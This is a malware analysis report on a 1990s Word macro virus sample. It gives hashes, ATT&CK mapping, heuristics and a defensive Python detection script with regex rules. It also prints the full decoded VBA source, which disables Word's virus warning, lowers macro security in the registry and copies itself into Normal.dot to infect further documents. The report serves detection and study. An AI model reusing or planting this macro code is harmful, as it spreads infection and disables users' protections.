Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 955c65af91492775…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 1999-07-07 18:54:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 3acb6e6373574e3278ceea31f7271c2c
SHA-1: f7f4104d11b6fbd84bc77d90c1f647fbf1bf11d2
SHA-256: 955c65af91492775dcb9afcdd7b4250f9c93c620f2019e6cb797327ae8039079
Risk score: 128

Malware Insights

MITRE ATT&CK

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1112 Modify Registry (macro security level written under HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security)
  • T1562.001 Impair Defenses: Disable or Modify Tools (Options.VirusProtection set to 0)

The ThisDocument module carries a VBA macro bound to the Document_Close event, so it runs when the document is closed rather than when it is opened. Under On Error Resume Next it first switches off Word's macro virus warning (Options.VirusProtection = 0), suppresses the Normal template save prompt, alerts, screen updating and Ctrl+Break, and sets Level to 1 (Low) under HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security; with an empty file name argument, System.PrivateProfileString writes to the registry rather than to an .ini file, and the path is the Word 2000 (Office 9.0) key although the document itself was saved by Word 8.0. It then exports its own VBA component (VBProject.VBComponents(1).Export) into %WINDIR%\TEMP, built as Environ("WINDIR") & ".\TEMP\", under a random name of the form ~WR?000?.TMP (a letter A-Z in position 4, a digit in position 8), rewrites that file with the export header stripped and everything up to a comment-line end marker kept, and stores the file name in a Word profile setting (System.ProfileString, key DefaultFileName) so the next stage can find it. Finally, if the target module is still empty and the document has been saved, it loads that code with CodeModule.AddFromFile into the first VBA component of the Normal template, or of the active document when it is already running from Normal, and rewrites line 2 so that the copy in Normal.dot becomes a Document_Open handler while copies written into documents are Document_Close handlers. This is the infection routine of a self-replicating Word macro virus that spreads through Normal.dot; the macro performs no network access and executes no downloaded payload.

Heuristics (4)

  • CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • OLE_VBA_MACROS (medium, 2 related findings): document contains VBA macro code
  • OLE_VBA_DOCOPEN (high): Document_Open macro. The handler in this copy is Document_Close; the literal "Document_Open()" is the name the macro writes into the Normal template when it infects it (the Replaceline call in the extracted source), so the finding still reflects auto-executing code.
  • OLE_VBA_ENVIRON (low): Environ() call (environment variable access), used to build the %WINDIR%\TEMP drop path
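The behaviour summarised above can be re-checked mechanically. The script below is an added example written for this page, not the analyzer's own code and not the oletools implementation: it re-implements the report's OLE_VBA_DOCOPEN and OLE_VBA_ENVIRON checks as regular expressions, adds rules of its own (VBA_VIRUSPROTECTION_OFF, VBA_REG_SECURITY_LEVEL, VBA_SELF_EXPORT, VBA_CODE_INJECTION, VBA_DOWNLOADER, all hypothetical names) for the behaviours visible in the macro, runs them over an excerpt of macros.bas embedded inline, and emulates the macro's TEMP file name generator so the resulting pattern can serve as a host IOC. It goes beyond the page's two heuristics in that it classifies the macro from the combination of hits rather than flagging single keywords.

```python
# Added example for this report, not the analyzer's code: rule ids other than
# OLE_VBA_DOCOPEN / OLE_VBA_ENVIRON are hypothetical names chosen here.
import random
import re

# Excerpt of the sample's ThisDocument module, copied from macros.bas above.
VBA_SOURCE = r"""
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = (0)
γ = Environ("WINDIR") & ".\TEMP\"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Randomize: α = "~WR00000.TMP": Mid(α, 4, 1) = Chr(Int((26 * Rnd) + 65)): Mid(α, 8, 1) = Int(Rnd() * 10)
VBProject.VBComponents(1).Export (γ & α)
' ... (loop that strips the export header from the TEMP file omitted)
Set α = IIf(MacroContainer <> NormalTemplate, NormalTemplate, ActiveDocument).VBProject.VBComponents(1)
α.CodeModule.AddFromFile γ & System.ProfileString("", "DefaultFileName")
α.CodeModule.Replaceline 2, "Private Sub " & IIf(MacroContainer <> NormalTemplate, "Document_Open()", "Document_Close()")
End Sub
""".strip()

# (rule id, severity, regex, meaning); VBA identifiers are case-insensitive.
RULES = [
    ("OLE_VBA_DOCOPEN", "high",
     r"\bSub\s+(?:Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec)\b",
     "event handler that runs without user interaction"),
    ("OLE_VBA_ENVIRON", "low", r"\bEnviron\s*\(", "environment variable access"),
    ("VBA_VIRUSPROTECTION_OFF", "high", r"\bOptions\.VirusProtection\s*=\s*\(?0\)?",
     "turns off Word's macro virus warning"),
    ("VBA_REG_SECURITY_LEVEL", "high",
     r'PrivateProfileString\s*\(\s*""\s*,\s*"HKEY_[^"]*\\Security"\s*,\s*"Level"\s*\)\s*=',
     "sets the Office macro security level via the registry"),
    ("VBA_SELF_EXPORT", "high", r"\bVBComponents\s*\(\s*\d+\s*\)\s*\.Export\b",
     "exports its own module to disk"),
    ("VBA_CODE_INJECTION", "high",
     r"\bCodeModule\.(?:AddFromFile|AddFromString|InsertLines|ReplaceLine)\b",
     "injects code into another VBA project (Normal template infection)"),
    ("VBA_DOWNLOADER", "high",
     r"\b(?:URLDownloadToFile|XMLHTTP|WinHttp|InternetOpen|WScript\.Shell|CreateObject|Shell)\b",
     "fetches or executes an external payload"),
]


def scan(source):
    """Map each firing rule id to its (line number, matched text) pairs."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for rule_id, _sev, pattern, _desc in RULES:
            for m in re.finditer(pattern, line, re.IGNORECASE):
                hits.setdefault(rule_id, []).append((lineno, m.group(0)))
    return hits


def classify(hits):
    """What the combination of hits says about the macro's role."""
    if "VBA_SELF_EXPORT" in hits and "VBA_CODE_INJECTION" in hits:
        return "self-replicating macro virus"
    if "VBA_DOWNLOADER" in hits:
        return "downloader/dropper"
    if "OLE_VBA_DOCOPEN" in hits:
        return "auto-executing macro, role unclear"
    return "no auto-executing macro"


def report(source):
    """Findings in rule order, then the verdict."""
    hits = scan(source)
    out = []
    for rule_id, sev, _pattern, desc in RULES:
        if rule_id in hits:
            where = ", ".join(str(n) for n, _ in hits[rule_id])
            out.append(f"{rule_id:24} {sev:6} line(s) {where}: {desc}")
    out.append("verdict: " + classify(hits))
    return out


# Host IOC: the macro's two Mid() edits turn "~WR00000.TMP" into this shape.
DROPPED_NAME_RE = re.compile(r"^~WR[A-Z]000[0-9]\.TMP$")


def dropped_file_names(n, seed=0):
    """Emulate the name generator; VBA Mid() positions 4 and 8 are 1-based,
    hence Python indices 3 and 7."""
    rng = random.Random(seed)
    names = []
    for _ in range(n):
        name = list("~WR00000.TMP")
        name[3] = chr(int(26 * rng.random()) + 65)  # Chr(Int((26 * Rnd) + 65))
        name[7] = str(int(rng.random() * 10))       # Int(Rnd() * 10)
        names.append("".join(name))
    return names


def is_dropped_file_name(name):
    """True when a TEMP file name matches what the macro produces."""
    return DROPPED_NAME_RE.match(name) is not None


if __name__ == "__main__":
    print("\n".join(report(VBA_SOURCE)))
```

Running it prints one line per firing rule followed by the verdict "self-replicating macro virus"; VBA_DOWNLOADER does not fire, which is consistent with the macro containing no network or shell calls. Sweeping %WINDIR%\TEMP for names matching ~WR[A-Z]000[0-9].TMP, and checking the Level value under the Office 9.0 Word\Security key, are the corresponding host-side checks.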

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  5552 bytes
SHA-256: 9105db495f750f0da90f85af594a5f7c0977c992182c5c059784793ac3f6ef24

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Shadow
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = (0)
Options.SaveNormalPrompt = (0)
Application.DisplayAlerts = (0)
Application.ScreenUpdating = (0)
Application.EnableCancelKey = (0)
γ = Environ("WINDIR") & ".\TEMP\"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Do While FileLen(γ & System.ProfileString("", "DefaultFileName")) = 0
Randomize: α = "~WR00000.TMP": Mid(α, 4, 1) = Chr(Int((26 * Rnd) + 65)): Mid(α, 8, 1) = Int(Rnd() * 10)
VBProject.VBComponents(1).Export (γ & α)
Open γ & α For Input As #1
For η = 1 To 4: Line Input #1, �: Next: η = ""
Do Until ι = "'�"
Line Input #1, ι
η = η & ι & Chr(13) & Chr(10)
Loop: Close #1
Open γ & α For Output As #1: Print #1, η: Close #1
System.ProfileString("", "DefaultFileName") = α: Loop
Set α = IIf(MacroContainer <> NormalTemplate, NormalTemplate, ActiveDocument).VBProject.VBComponents(1)
If α.CodeModule.CountOfLines > 0 Or ActiveDocument.Path = "" Then Exit Sub
α.CodeModule.AddFromFile γ & System.ProfileString("", "DefaultFileName")
α.CodeModule.Replaceline 2, "Private Sub " & IIf(MacroContainer <> NormalTemplate, "Document_Open()", "Document_Close()")
End Sub
'�

' Processing file: /opt/analyzer/scan_staging/cffa595df4794524bb61721372238d9e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3194 bytes
' Line #0:
' 	QuoteRem 0x0000 0x002D "Copyright (C) 1998 by FlyShadow ~^^~ - Shadow"
' Line #1:
' 	FuncDefn (Private Sub Document_Close())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #6:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #7:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #8:
' 	LitStr 0x0006 "WINDIR"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x0007 ".\TEMP\"
' 	Concat 
' 	St γ 
' Line #9:
' 	LitDI4 0x0001 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #10:
' 	Ld γ 
' 	LitStr 0x0000 ""
' 	LitStr 0x000F "DefaultFileName"
' 	Ld System 
' 	ArgsMemLd ProfileString 0x0002 
' 	Concat 
' 	ArgsLd FileLen 0x0001 
' 	LitDI2 0x0000 
' 	Eq 
' 	DoWhile 
' Line #11:
' 	ArgsCall Read 0x0000 
' 	BoS 0x0000 
' 	LitStr 0x000C "~WR00000.TMP"
' 	St α 
' 	BoS 0x0000 
' 	LitDI2 0x001A 
' 	Ld Rnd 
' 	Mul 
' 	Paren 
' 	LitDI2 0x0041 
' 	Add 
' 	FnInt 
' 	ArgsLd Chr 0x0001 
' 	Ld α 
' 	LitDI2 0x0004 
' 	LitDI2 0x0001 
' 	Mid 
' 	BoS 0x0000 
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x000A 
' 	Mul 
' 	FnInt 
' 	Ld α 
' 	LitDI2 0x0008 
' 	LitDI2 0x0001 
' 	Mid 
' Line #12:
' 	Ld γ 
' 	Ld α 
' 	Concat 
' 	Paren 
' 	LitDI2 0x0001 
' 	Ld VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #13:
' 	Ld γ 
' 	Ld α 
' 	Concat 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #14:
' 	StartForVariable 
' 	Ld η 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0004 
' 	For 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Ld � 
' 	LineInput 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St η 
' Line #15:
' 	Ld ι 
' 	LitStr 0x0002 "'�"
' 	Eq 
' 	DoUnitil 
' Line #16:
' 	LitDI2 0x0001 
' 	Ld ι 
' 	LineInput 
' Line #17:
' 	Ld η 
' 	Ld ι 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x000A 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St η 
' Line #18:
' 	Loop 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Shar
... (truncated)